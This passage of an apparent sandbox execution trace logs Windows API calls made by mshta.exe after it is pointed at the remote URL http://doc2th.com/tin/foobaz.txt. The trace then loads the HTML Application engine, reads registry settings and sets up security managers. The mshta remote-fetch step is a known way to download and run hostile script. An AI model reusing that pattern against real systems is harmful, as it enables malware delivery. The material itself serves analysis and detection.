pszPath="http://doc2th.com/tin/foobaz.txt") [0026.545] PathRemoveBlanksW (in: pszPath="http://doc2th.com/tin/foobaz.txt" | out: pszPath="http://doc2th.com/tin/foobaz.txt") [0026.545] PathUnquoteSpacesW (in: lpsz="http://doc2th.com/tin/foobaz.txt" | out: lpsz="http://doc2th.com/tin/foobaz.txt") returned 0 [0026.546] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://doc2th.com/tin/foobaz.txt", ppmk=0x40f924*=0x0, dwFlags=0x1 | out: ppmk=0x40f924*=0xff600) returned 0x0 [0026.555] CoCreateInstance (in: rclsid=0x63289770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6330b75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x636896d4 | out: ppv=0x636896d4*=0x121030) returned 0x0 [0026.569] DllGetClassObject (in: rclsid=0x11e6fc*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7673ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40ebd4 | out: ppv=0x40ebd4*=0x63688cb0) returned 0x0 [0026.573] GetCurrentThreadId () returned 0xa1c [0026.587] RegisterClassExW (param_1=0x40ea6c) returned 0xc19b [0026.587] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc19b, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x63150000, lpParam=0x0) returned 0x10202 [0026.587] GetWindowLongW (hWnd=0x10202, nIndex=-20) returned 0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x81, wParam=0x0, lParam=0x40e748) returned 0x1 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x83, wParam=0x0, lParam=0x40e770) returned 0x0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x1, wParam=0x0, lParam=0x40e748) returned 0x0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0026.587] DefWindowProcW (hWnd=0x10202, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0026.588] CreateCompatibleDC (hdc=0x0) returned 0x210107a8 [0026.588] GetDeviceCaps (hdc=0x210107a8, index=90) returned 96 [0026.588] GetDeviceCaps (hdc=0x210107a8, index=88) returned 96 [0026.588] GetSystemMetrics (nIndex=68) returned 4 [0026.588] GetSystemMetrics (nIndex=69) returned 4 [0026.588] GetSystemMetrics (nIndex=2) returned 17 [0026.588] GetSystemMetrics (nIndex=3) returned 17 [0026.588] GetStockObject (i=13) returned 0x18a002e [0026.588] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x18a002e [0026.588] GetTextMetricsW (in: hdc=0x210107a8, lptm=0x40eb04 | out: lptm=0x40eb04) returned 1 [0026.588] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x18a002e [0026.588] DeleteObject (ho=0x18a002e) returned 1 [0026.588] GetSystemDefaultLCID () returned 0x409 [0026.588] GetUserDefaultLCID () returned 0x409 [0026.588] GetACP () returned 0x4e4 [0026.588] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x40ea78, cchData=41 | out: lpLCData="1") returned 2 [0026.588] _wtoi (_String="1") returned 1 [0026.588] RegCloseKey (hKey=0x0) 
returned 0x6 [0026.588] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x40eacc, cchData=16 | out: lpLCData="0123456789") returned 11 [0026.588] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x6368b038, fWinIni=0x0 | out: pvParam=0x6368b038) returned 1 [0026.588] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x40eb40, fWinIni=0x0 | out: pvParam=0x40eb40) returned 1 [0026.589] GetSystemWindowsDirectoryW (in: lpBuffer=0x40e94c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0026.589] lstrlenW (lpString="C:\\Windows") returned 10 [0026.589] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0026.589] CreateActCtxW (pActCtx=0x40e928) returned 0x11fa2c [0026.590] ActivateActCtx (in: hActCtx=0x11fa2c, lpCookie=0x40e8f8 | out: hActCtx=0x11fa2c, lpCookie=0x40e8f8) returned 1 [0026.590] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74080000 [0026.592] DeactivateActCtx (dwFlags=0x0, ulCookie=0x17c00001) returned 1 [0026.592] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0026.593] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0026.593] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0026.593] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0026.593] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x40e558, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.593] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x40e760, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.593] GetCurrentProcess () returned 0xffffffff [0026.593] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x40e968, nSize=0x104 | out: lpBaseName="mShta.exe") returned 0x9 
[0026.594] PathFindFileNameW (pszPath="C:\\Windows\\system32\\mShta.exe") returned="mShta.exe" [0026.594] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0026.594] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x40e544, pvData=0x40e550, pcbData=0x40e54c*=0x4 | out: pdwType=0x40e544*=0x0, pvData=0x40e550, pcbData=0x40e54c*=0x4) returned 0x2 [0026.594] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40e4bc | out: phkResult=0x40e4bc*=0x168) returned 0x0 [0026.594] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40e4c0 | out: phkResult=0x40e4c0*=0x164) returned 0x0 [0026.594] RegOpenKeyExW (in: hKey=0x164, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x40e47c | out: phkResult=0x40e47c*=0x0) returned 0x2 [0026.594] RegOpenKeyExW (in: hKey=0x168, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x40e47c | out: phkResult=0x40e47c*=0x0) returned 0x2 [0026.594] RegCloseKey (hKey=0x0) returned 0x6 [0026.594] RegCloseKey (hKey=0x0) returned 0x6 [0026.594] RegCloseKey (hKey=0x168) returned 0x0 [0026.594] RegCloseKey (hKey=0x164) returned 0x0 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] GetCurrentThreadId () returned 0xa1c [0026.595] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc19c [0026.595] CoInternetIsFeatureEnabled (FeatureEntry=0xc, 
dwFlags=0x2) returned 0x1 [0026.596] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x63688cd4, dwReserved=0x0 | out: ppSM=0x63688cd4*=0x121f20) returned 0x0 [0026.605] GetCurrentThreadId () returned 0xa1c [0026.605] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x40e86c | out: ppURI=0x40e86c*=0x11ab04) returned 0x0 [0026.605] IUri:GetPropertyDWORD (in: This=0x11ab04, uriProp=0x11, pdwProperty=0x40e854, dwFlags=0x0 | out: pdwProperty=0x40e854*=0x11) returned 0x0 [0026.605] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x121764, dwReserved=0x0 | out: ppSM=0x121764*=0x122f88) returned 0x0 [0026.605] IInternetSecurityManager:SetSecuritySite (This=0x122f88, pSite=0x12176c) returned 0x0 [0026.605] IUnknown:AddRef (This=0x12176c) returned 0x28 [0026.605] IUnknown:QueryInterface (in: This=0x12176c, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40e824 | out: ppvObject=0x40e824*=0x121770) returned 0x0 [0026.605] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x122fb0 | out: ppvObject=0x122fb0*=0x0) returned 0x80004002 [0026.605] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x122fac | out: ppvObject=0x122fac*=0x0) returned 0x80004002 [0026.605] IServiceProvider:QueryService (in: 
This=0x121770, guidService=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x122fa8 | out: ppvObject=0x122fa8*=0x0) returned 0x80004002 [0026.606] IUnknown:Release (This=0x121770) returned 0x0 [0026.606] IInternetSecurityManager:GetSecurityId (in: This=0x122f88, pwszUrl="about:blank", pbSecurityId=0x40e8c0, pcbSecurityId=0x40e8b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40e8c0*=0x61, pcbSecurityId=0x40e8b4*=0xf) returned 0x0 [0026.613] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x40de40*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40d4f8 | out: ppv=0x40d4f8*=0x63688c70) returned 0x0 [0026.613] IUnknown:AddRef (This=0x63688c70) returned 0x1 [0026.613] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40e0bc | out: ppvObject=0x40e0bc*=0x63688c70) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e27c | out: ppvObject=0x40e27c*=0x63688c7c) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, 
pcchResult=0x40e2c4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x40e2c4*=0xc) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.614] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e190 | out: ppv=0x40e190*=0x63688c70) returned 0x0 [0026.614] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e27c | out: ppvObject=0x40e27c*=0x63688c7c) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, pcchResult=0x40e2d4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x40e2d4*=0x0) returned 0x800c0011 [0026.614] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.614] IUnknown:Release (This=0x11ab04) returned 0x2 [0026.614] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x40e894, dwReserved=0x0 | out: ppSM=0x40e894*=0x1234e8) returned 0x0 [0026.615] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea44 | out: phkResult=0x40ea44*=0x1b0) returned 0x0 [0026.615] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea48 | out: phkResult=0x40ea48*=0x1bc) returned 0x0 [0026.615] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea04 | out: phkResult=0x40ea04*=0x0) returned 0x2 
[0026.615] RegOpenKeyExW (in: hKey=0x1b0, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea04 | out: phkResult=0x40ea04*=0x0) returned 0x2 [0026.615] RegCloseKey (hKey=0x0) returned 0x6 [0026.615] RegCloseKey (hKey=0x0) returned 0x6 [0026.615] RegCloseKey (hKey=0x1b0) returned 0x0 [0026.615] RegCloseKey (hKey=0x1bc) returned 0x0 [0026.615] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x40e888 | out: ppURI=0x40e888*=0x11ab04) returned 0x0 [0026.616] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e160 | out: ppv=0x40e160*=0x63688c70) returned 0x0 [0026.616] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e24c | out: ppvObject=0x40e24c*=0x63688c7c) returned 0x0 [0026.616] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.616] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, pcchResult=0x40e294, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x40e294*=0xc) returned 0x0 [0026.616] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.616] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e160 | out: ppv=0x40e160*=0x63688c70) returned 0x0 [0026.616] IUnknown:QueryInterface (in: This=0x63688c70, 
riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e24c | out: ppvObject=0x40e24c*=0x63688c7c) returned 0x0 [0026.616] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.616] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, pcchResult=0x40e2a4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x40e2a4*=0x0) returned 0x800c0011 [0026.616] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.616] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0026.616] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0026.616] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0026.617] IUnknown:Release (This=0x11ab04) returned 0x2 [0026.617] GetDC (hWnd=0x0) returned 0xb0108b5 [0026.617] GetDeviceCaps (hdc=0xb0108b5, index=88) returned 96 [0026.617] ReleaseDC (hWnd=0x0, hDC=0xb0108b5) returned 1 [0026.617] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0026.617] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40eae0 | out: phkResult=0x40eae0*=0x128) returned 0x0 [0026.617] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40eae4 | out: phkResult=0x40eae4*=0x1b0) returned 0x0 [0026.617] RegOpenKeyExW (in: hKey=0x1b0, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x40eaa0 | out: phkResult=0x40eaa0*=0x0) returned 0x2 [0026.617] RegOpenKeyExW (in: hKey=0x128, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x40eaa0 | out: phkResult=0x40eaa0*=0x0) returned 0x2 [0026.617] RegCloseKey (hKey=0x0) returned 0x6 [0026.617] 
RegCloseKey (hKey=0x0) returned 0x6 [0026.617] RegCloseKey (hKey=0x128) returned 0x0 [0026.617] RegCloseKey (hKey=0x1b0) returned 0x0 [0026.617] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c10000 [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="InitializeSRWLock") returned 0x76fa9981 [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="AcquireSRWLockExclusive") returned 0x76fa334e [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="AcquireSRWLockShared") returned 0x76fa338e [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="ReleaseSRWLockExclusive") returned 0x76fa3324 [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="ReleaseSRWLockShared") returned 0x76fa33d7 [0026.618] RtlInitializeConditionVariable () returned 0x12a53c [0026.618] IUnknown:Release (This=0x63688cb0) returned 0x1 [0026.633] IUnknown_QueryService (in: punk=0x636896a4, guidService=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x121088 | out: ppvOut=0x121088*=0x0) returned 0x80004005 [0026.633] IUnknown:QueryInterface (in: This=0x636896a4, riid=0x771342d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40f830 | out: ppvObject=0x40f830*=0x636896b8) returned 0x0 [0026.633] IServiceProvider:QueryService (in: This=0x636896b8, guidService=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x121088 | out: ppvObject=0x121088*=0x0) returned 0x80004005 
[0026.633] IUnknown:Release (This=0x636896b8) returned 0x1 [0026.633] IInternetSecurityManager:SetSecuritySite (This=0x122f88, pSite=0x12176c) returned 0x0 [0026.633] IUnknown:Release (This=0x12176c) returned 0x0 [0026.633] IUnknown:AddRef (This=0x12176c) returned 0x28 [0026.633] IUnknown:QueryInterface (in: This=0x12176c, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40f868 | out: ppvObject=0x40f868*=0x121770) returned 0x0 [0026.633] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x122fb0 | out: ppvObject=0x122fb0*=0x0) returned 0x80004002 [0026.633] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x122fac | out: ppvObject=0x122fac*=0x0) returned 0x80004002 [0026.634] IServiceProvider:QueryService (in: This=0x121770, guidService=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x122fa8 | out: ppvObject=0x122fa8*=0x636896bc) returned 0x0 [0026.634] IUnknown:Release (This=0x121770) returned 0x0 [0026.634] CoTaskMemAlloc (cb=0x6d) returned 0x12a5f0 [0026.634] CoTaskMemAlloc 
(cb=0x9) returned 0x11cfc8 [0026.648] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0026.653] IsCharSpaceW (wch=0x48) returned 0 [0026.653] IsCharAlphaNumericW (ch=0x5c) returned 0 [0026.653] IsCharSpaceW (wch=0x5c) returned 0 [0026.653] IsCharSpaceW (wch=0x41) returned 0 [0026.653] IsCharAlphaNumericW (ch=0x20) returned 0 [0026.653] IsCharSpaceW (wch=0x20) returned 1 [0026.653] IsCharSpaceW (wch=0x7b) returned 0 [0026.653] IsCharSpaceW (wch=0x20) returned 1 [0026.653] IsCharAlphaNumericW (ch=0x7b) returned 0 [0026.653] IsCharSpaceW (wch=0x62) returned 0 [0026.653] IsCharAlphaNumericW (ch=0x3a) returned 0 [0026.653] IsCharSpaceW (wch=0x3a) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x3a) returned 0 [0026.655] IsCharSpaceW (wch=0x75) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x28) returned 0 [0026.655] IsCharSpaceW (wch=0x28) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x28) returned 0 [0026.655] IsCharSpaceW (wch=0x23) returned 0 [0026.655] IsCharSpaceW (wch=0x23) returned 0 [0026.655] IsCharSpaceW (wch=0x7d) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x7d) returned 0 [0026.655] IsCharSpaceW (wch=0x29) returned 0 [0026.655] IsCharSpaceW (wch=0x75) returned 0 [0026.656] IsCharSpaceW (wch=0x75) returned 0 [0026.656] IsCharSpaceW (wch=0x29) returned 0 [0026.656] CoTaskMemFree (pv=0x12a5f0) [0026.656] CoTaskMemFree (pv=0x11cfc8) [0026.656] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75580000 [0026.656] GetProcAddress (hModule=0x75580000, lpProcName=0x6) returned 0x75583e59 [0026.656] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0026.656] IsOS (dwOS=0x25) returned 1 [0026.656] GetSysColor (nIndex=26) returned 0xcc6600 [0026.656] IsOS (dwOS=0x25) returned 1 [0026.656] GetSysColor (nIndex=5) returned 0xffffff [0026.656] GetSysColor (nIndex=8) returned 0x0 [0026.658] wcstol (in: _String="0,0,255", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",0,255") 
returned 0 [0026.658] wcstol (in: _String="0,255", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",255") returned 0 [0026.658] wcstol (in: _String="255", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*="") returned 255 [0026.658] wcstol (in: _String="128,0,128", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",0,128") returned 128 [0026.658] wcstol (in: _String="0,128", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",128") returned 0 [0026.658] wcstol (in: _String="128", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*="") returned 128 [0026.659] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0026.659] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0026.659] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x40f57c | out: 